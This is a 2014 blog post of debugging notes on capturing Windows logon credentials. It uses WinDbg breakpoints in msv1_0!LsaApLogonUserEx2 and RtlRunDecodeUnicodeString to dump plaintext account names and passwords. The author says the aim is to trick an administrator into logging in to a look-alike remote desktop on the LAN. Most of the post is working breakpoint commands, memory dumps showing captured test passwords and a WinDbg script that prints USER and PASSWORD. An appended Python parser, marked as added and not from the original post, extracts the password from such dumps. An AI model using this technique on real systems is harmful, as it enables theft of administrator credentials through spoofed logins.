
且行且记录

Record the small things, and go further!

Remote Desktop test: obtaining the account and password

2014-03-06 10:42:52 | Category: Debugging notes


Both local logon and remote logon authentication go through the function msv1_0!LsaApLogonUserEx2, so setting a breakpoint on msv1_0!LsaApLogonUserEx2 is one way to obtain the account name and password. This function has many parameters, however, and some of the data is encoded, so it is not very direct to read.

In an earlier small test on text boxes and password boxes I found that whenever a password is present, ntdll.RtlRunEncodeUnicodeString is called to encode it and ntdll.RtlRunDecodeUnicodeString to decode it. So we can set breakpoints on these two functions and read their parameters instead; their parameters are much simpler. Here the breakpoint is on RtlRunDecodeUnicodeString: once it has decoded the string, the account and password are visible.

The purpose of this test was to verify that, by setting up on the LAN a remote desktop identical to the target, the account and password can be tricked out of an administrator when he logs in to that remote desktop to shut it down.

We set up a virtual machine, debug it with windbg, set a breakpoint and write its output to a log file. In this example it goes as follows:

kd> .logopen c:\temp\rdp2.log
Opened log file 'c:\temp\rdp2.log'
kd> bp 77c49ab0  ".echo ===dump===;db edi;g"
kd> bl
 0 e 77c49aaa     0001 (0001) msv1_0!LsaApLogonUserEx2+0xa94 "dd esp l4"
 1 e 77c49ab0     0001 (0001) msv1_0!LsaApLogonUserEx2+0xa9a ".echo ===dump===;db edi;g"

kd> bd 0
kd> g
===dump===
000de2e4  18 00 18 00 10 e3 0d 00-61 00 64 00 6d 00 69 00  ........a.d.m.i.
000de2f4  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000de304  72 00 00 00 56 00 58 00-50 00 00 00 31 00 31 00  r...V.X.P...1.1.
000de314  31 00 32 00 32 00 32 00-33 00 33 00 33 00 34 00  1.2.2.2.3.3.3.4.
000de324  34 00 34 00 00 00 00 00-00 00 00 00 00 00 00 00  4.4.............
000de334  55 00 53 00 0e 00 0e 00-1c 01 0c 00 00 00 00 00  U.S.............
000de344  48 00 00 00 58 00 00 00-00 00 00 00 14 00 00 00  H...X...........
000de354  02 00 34 00 02 00 00 00-00 00 18 00 03 00 0f 00  ..4.............
===dump===
000dda84  14 00 14 00 b0 da 0d 00-61 00 64 00 6d 00 69 00  ........a.d.m.i.
000dda94  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000ddaa4  72 00 00 00 56 00 58 00-50 00 00 00 78 00 70 00  r...V.X.P...x.p.
000ddab4  78 00 70 00 72 00 64 00-70 00 72 00 64 00 70 00  x.p.r.d.p.r.d.p.
000ddac4  00 00 00 00 00 00 00 00-00 00 0d 00 16 00 0d 00  ................
000ddad4  21 01 0c 00 00 00 00 00-66 77 5e 66 04 00 00 00  !.......fw^f....
000ddae4  16 00 16 00 18 db 0d 00-06 00 06 00 2e db 0d 00  ................
000ddaf4  16 00 16 00 34 db 0d 00-5f cc e0 f5 f8 4c 22 e7  ....4..._....L".
===dump===
000dda84  10 00 10 00 b0 da 0d 00-61 00 64 00 6d 00 69 00  ........a.d.m.i.
000dda94  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000ddaa4  72 00 00 00 56 00 58 00-50 00 00 00 74 00 65 00  r...V.X.P...t.e.
000ddab4  73 00 74 00 65 00 74 00-73 00 74 00 00 00 00 00  s.t.e.t.s.t.....
000ddac4  00 00 00 00 00 00 00 00-00 00 0d 00 16 00 0d 00  ................
000ddad4  21 01 0c 00 00 00 00 00-66 77 5e 66 04 00 00 00  !.......fw^f....
000ddae4  16 00 16 00 18 db 0d 00-06 00 06 00 2e db 0d 00  ................
000ddaf4  16 00 16 00 34 db 0d 00-59 b0 f0 84 66 8d 53 6f  ....4...Y...f.So
===dump===
000d3c9c  0c 00 0c 00 c8 3c 0d 00-41 00 64 00 6d 00 69 00  .....<..A.d.m.i.
000d3cac  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000d3cbc  72 00 00 00 56 00 58 00-50 00 00 00 31 00 31 00  r...V.X.P...1.1.
000d3ccc  31 00 33 00 33 00 33 00-00 00 00 00 00 00 00 00  1.3.3.3.........
000d3cdc  00 00 00 00 03 00 0c 00-e7 01 0a 00 a0 3b 0d 00  .............;..
000d3cec  6c 00 69 00 63 00 79 00-00 00 00 00 2b 00 03 00  l.i.c.y.....+...
000d3cfc  e4 01 0c 00 10 7b e5 77-ef cd ab 89 00 10 00 00  .....{.w........
000d3d0c  01 00 00 00 06 1c 25 81-00 00 00 00 71 4e c8 44  ......%.....qN.D
===dump===
000dda84  16 00 16 00 ac da 0d 00-75 00 75 00 75 00 75 00  ........u.u.u.u.
000dda94  75 00 75 00 75 00 75 00-75 00 75 00 75 00 00 00  u.u.u.u.u.u.u...
000ddaa4  56 00 58 00 50 00 00 00-37 00 37 00 37 00 37 00  V.X.P...7.7.7.7.
000ddab4  37 00 37 00 37 00 37 00-37 00 37 00 37 00 00 00  7.7.7.7.7.7.7...
000ddac4  00 00 00 00 00 00 00 00-00 00 0d 00 16 00 0d 00  ................
000ddad4  21 01 0c 00 00 00 00 00-66 77 5e 66 04 00 00 00  !.......fw^f....
000ddae4  16 00 16 00 18 db 0d 00-06 00 06 00 2e db 0d 00  ................
000ddaf4  16 00 16 00 34 db 0d 00-d3 9f bd ea c1 29 e1 a0  ....4........)..
===dump===
000d3c9c  14 00 14 00 be 3c 0d 00-75 00 75 00 75 00 75 00  .....<..u.u.u.u.
000d3cac  73 00 65 00 72 00 72 00-00 00 56 00 58 00 50 00  s.e.r.r...V.X.P.
000d3cbc  00 00 32 00 32 00 32 00-32 00 32 00 32 00 32 00  ..2.2.2.2.2.2.2.
000d3ccc  32 00 32 00 32 00 00 00-00 00 00 00 00 00 00 00  2.2.2...........
000d3cdc  00 00 00 00 03 00 0c 00-e7 01 0c 00 a0 3b 0d 00  .............;..
000d3cec  00 00 00 00 b4 00 00 00-00 00 00 00 2b 00 03 00  ............+...
000d3cfc  e4 01 0c 00 10 7b e5 77-ef cd ab 89 00 10 00 00  .....{.w........
000d3d0c  01 00 00 00 06 1c 25 81-00 00 00 00 71 4e c8 44  ......%.....qN.D

Below are some more debugging notes.

kd> ***************
kd> ub . l20
msv1_0!LsaApLogonUserEx2+0x8d0:
001b:77c49a2c 6689430e        mov     word ptr [ebx+0Eh],ax
001b:77c49a30 8b4318          mov     eax,dword ptr [ebx+18h]
001b:77c49a33 668b0f          mov     cx,word ptr [edi]
001b:77c49a36 3bc6            cmp     eax,esi
001b:77c49a38 0f841a3f0000    je      msv1_0!LsaApLogonUserEx2+0x8de (77c4d958)
001b:77c49a3e 663bce          cmp     cx,si
001b:77c49a41 0f841f3f0000    je      msv1_0!LsaApLogonUserEx2+0x8ed (77c4d966)
001b:77c49a47 2b4514          sub     eax,dword ptr [ebp+14h]
001b:77c49a4a 898580f9ffff    mov     dword ptr [ebp-680h],eax
001b:77c49a50 3b4518          cmp     eax,dword ptr [ebp+18h]
001b:77c49a53 0f83813b0000    jae     msv1_0!LsaApLogonUserEx2+0x2d7 (77c4d5da)
001b:77c49a59 0fb7d1          movzx   edx,cx
001b:77c49a5c 03d0            add     edx,eax
001b:77c49a5e 3b5518          cmp     edx,dword ptr [ebp+18h]
001b:77c49a61 0f87733b0000    ja      msv1_0!LsaApLogonUserEx2+0x2d7 (77c4d5da)
001b:77c49a67 8bd0            mov     edx,eax
001b:77c49a69 f7d2            not     edx
001b:77c49a6b f6c201          test    dl,1
001b:77c49a6e 0f84663b0000    je      msv1_0!LsaApLogonUserEx2+0x2d7 (77c4d5da)
001b:77c49a74 03c3            add     eax,ebx
001b:77c49a76 894318          mov     dword ptr [ebx+18h],eax
001b:77c49a79 66894b16        mov     word ptr [ebx+16h],cx
001b:77c49a7d 8b8544faffff    mov     eax,dword ptr [ebp-5BCh]
001b:77c49a83 66833802        cmp     word ptr [eax],2
001b:77c49a87 0f86e13e0000    jbe     msv1_0!LsaApLogonUserEx2+0x934 (77c4d96e)
001b:77c49a8d 837d0c05        cmp     dword ptr [ebp+0Ch],5
001b:77c49a91 0f844d3f0000    je      msv1_0!LsaApLogonUserEx2+0x9a7 (77c4d9e4)
001b:77c49a97 80bdecf9ffff00  cmp     byte ptr [ebp-614h],0
001b:77c49a9e 7414            je      msv1_0!LsaApLogonUserEx2+0xa9e (77c49ab4)
001b:77c49aa0 8975fc          mov     dword ptr [ebp-4],esi
001b:77c49aa3 57              push    edi <=== the account and password information is near this parameter
001b:77c49aa4 ffb5ecf9ffff    push    dword ptr [ebp-614h]
kd> u
msv1_0!LsaApLogonUserEx2+0xa94:
001b:77c49aaa ff153012c477    call    dword ptr [msv1_0!_imp__RtlRunDecodeUnicodeString (77c41230)] <=== breaks on this line
001b:77c49ab0 834dfcff        or      dword ptr [ebp-4],0FFFFFFFFh <=== after stepping over the call above, the edi parameter points to the account and password
001b:77c49ab4 ffb548faffff    push    dword ptr [ebp-5B8h]
001b:77c49aba 8d8558faffff    lea     eax,[ebp-5A8h]
001b:77c49ac0 50              push    eax
001b:77c49ac1 ff15c811c477    call    dword ptr [msv1_0!_imp__RtlCopyUnicodeString (77c411c8)]
001b:77c49ac7 397308          cmp     dword ptr [ebx+8],esi
001b:77c49aca 7413            je      msv1_0!LsaApLogonUserEx2+0xac9 (77c49adf)
kd> ***********
kd> kn
 # ChildEBP RetAddr 
00 00b0fc8c 744a78f4 msv1_0!LsaApLogonUserEx2+0xa94
01 00b0fcf8 74492891 LSASRV!NegLogonUserEx2+0x22d
02 00b0fe98 744922ae LSASRV!LsapAuApiDispatchLogonUser+0x33b
03 00b0feac 74489481 LSASRV!LpcLsaLogonUser+0x22
04 00b0fec4 744893a5 LSASRV!DispatchAPI+0x46
05 00b0ff50 74488cfa LSASRV!LpcHandler+0x153
06 00b0ff74 74488dbe LSASRV!SpmPoolThreadBase+0xb9
07 00b0ffb4 7c80b729 LSASRV!LsapThreadBase+0x91
08 00b0ffec 00000000 kernel32!BaseThreadStart+0x37
kd> dd esp l8
00b0f460  006c006f 【000dda84】 00b0fe6c 00000001
00b0f470  7c809c65 00000000 00000000 00000000
kd> db poi(@esp+4)
【000dda84】  12 00 12 00 b0 da 0d 00-61 00 64 00 6d 00 69 00  ........a.d.m.i.
000dda94  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000ddaa4  72 00 00 00 56 00 58 00-50 00 00 00 5e 31 6f 00  r...V.X.P...^1o.
000ddab4  5e 31 6c 03 5e 31 6c 03-5f 30 6c 03 5f 30 00 00  ^1l.^1l._0l._0..
000ddac4  00 00 00 00 00 00 00 00-78 44 0d 00 16 00 0d 00  ........xD......
000ddad4  21 01 08 00 00 00 00 00-5c 00 57 00 49 00 4e 00  !.......\.W.I.N.
000ddae4  44 00 4f 00 57 00 53 00-5c 00 73 00 79 00 73 00  D.O.W.S.\.s.y.s.
000ddaf4  74 00 65 00 6d 00 33 00-32 00 5c 00 4d 00 69 00  t.e.m.3.2.\.M.i.
kd> r
eax=000dda74 ebx=000dda70 ecx=ffff0012 edx=ffffffbf esi=00000000 edi=000dda84
eip=77c49aaa esp=00b0f460 ebp=00b0fc8c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
msv1_0!LsaApLogonUserEx2+0xa94:
001b:77c49aaa ff153012c477    call    dword ptr [msv1_0!_imp__RtlRunDecodeUnicodeString (77c41230)] ds:0023:77c41230={ntdll!RtlRunDecodeUnicodeString (7c950821)}
kd> pr
eax=000ddab2 ebx=000dda70 ecx=ffff006f edx=ffffff00 esi=00000000 edi=000dda84
eip=77c49ab0 esp=00b0f468 ebp=00b0fc8c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
msv1_0!LsaApLogonUserEx2+0xa9a:
001b:77c49ab0 834dfcff        or      dword ptr [ebp-4],0FFFFFFFFh ss:0023:00b0fc88=00000000
kd> db edi <=== here the account and the decoded password 111222333 can be seen!
【000dda84】  12 00 12 00 b0 da 0d 00-61 00 64 00 6d 00 69 00  ........a.d.m.i.
000dda94  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000ddaa4  72 00 00 00 56 00 58 00-50 00 00 00 31 00 31 00  r...V.X.P...1.1.
000ddab4  31 00 32 00 32 00 32 00-33 00 33 00 33 00 00 00  1.2.2.2.3.3.3...
000ddac4  00 00 00 00 00 00 00 00-78 44 0d 00 16 00 0d 00  ........xD......
000ddad4  21 01 08 00 00 00 00 00-5c 00 57 00 49 00 4e 00  !.......\.W.I.N.
000ddae4  44 00 4f 00 57 00 53 00-5c 00 73 00 79 00 73 00  D.O.W.S.\.s.y.s.
000ddaf4  74 00 65 00 6d 00 33 00-32 00 5c 00 4d 00 69 00  t.e.m.3.2.\.M.i.


[Addendum, 2014.5.6: a windbg script]

*pwd_vxp.x

.logappend c:\temp\logs\vxp.log
*vxp Login Test!
*r @$t0=0
*bp 77c49ab0 ".echo ===dump===;db edi;j (@$t0==1) '';'r @$t0=@$t0+1;gc'"
*bp 77c49ab0 ".echo ===dump===;db edi"
*bp 77c49ab0 ".echo ===dump===;db edi;.echo user=;du edi+8;.echo password=;dS edi"
bp 77c49ab0 ".echo ===dump===;db @edi;.printf \"USER= %mu\n\",@edi+8;.echo;.printf \"PASSWORD= %msu\n\",@edi;.echo"
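To make explicit what the `db edi` dump and the script's `du edi+8` / `%msu @edi` fields actually read, here is an added Python example (not code from the original post) that parses the WinDbg `db` lines above and decodes the structure: a UNICODE_STRING header at edi whose Buffer points at the password, an inline wide string at edi+8 for the user name, and, as an assumption, a second inline wide string for the domain/machine name.

```python
import re
import struct

# Constructed sample input: the first four lines of the post-decode `db edi`
# dump from the log above (edi = 000dda84), copied verbatim.
DUMP = """\
000dda84  12 00 12 00 b0 da 0d 00-61 00 64 00 6d 00 69 00  ........a.d.m.i.
000dda94  6e 00 69 00 73 00 74 00-72 00 61 00 74 00 6f 00  n.i.s.t.r.a.t.o.
000ddaa4  72 00 00 00 56 00 58 00-50 00 00 00 31 00 31 00  r...V.X.P...1.1.
000ddab4  31 00 32 00 32 00 32 00-33 00 33 00 33 00 00 00  1.2.2.2.3.3.3...
"""

# One `db` line: optional 【 】 highlight, 8-digit address, 16 byte pairs.
LINE_RE = re.compile(
    r"^[\[【]?([0-9a-fA-F]{8})[\]】]?\s+((?:[0-9a-fA-F]{2}[ -]){15}[0-9a-fA-F]{2})")

def parse_db(text):
    """Turn WinDbg `db` output into (base_address, bytes)."""
    base, buf = None, bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        addr = int(m.group(1), 16)
        if base is None:
            base = addr
        elif addr != base + len(buf):
            raise ValueError("non-contiguous dump at %08x" % addr)
        buf += bytes.fromhex(re.sub(r"[ -]", "", m.group(2)))
    return base, bytes(buf)

def read_wstr(buf, off):
    """Read a NUL-terminated UTF-16LE string; return (text, offset past NUL)."""
    end = off
    while end + 2 <= len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[off:end].decode("utf-16-le"), end + 2

def decode_logon_blob(text):
    """Decode the layout the script's `du edi+8` / `%msu @edi` rely on."""
    base, buf = parse_db(text)
    # +0: UNICODE_STRING {Length, MaximumLength, Buffer} describing the password
    length, _maximum, ptr = struct.unpack_from("<HHI", buf, 0)
    user, off = read_wstr(buf, 8)        # inline wide string at edi+8
    domain, _ = read_wstr(buf, off)      # assumed: next string is the domain/machine name
    pw_off = ptr - base                  # Buffer is a pointer into the same dump
    if not 0 <= pw_off <= len(buf) - length:
        raise ValueError("password buffer lies outside the dumped range")
    return {"user": user, "domain": domain, "password_len": length,
            "password": buf[pw_off:pw_off + length].decode("utf-16-le")}
```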

NetEase, Inc. All rights reserved © 1997-2017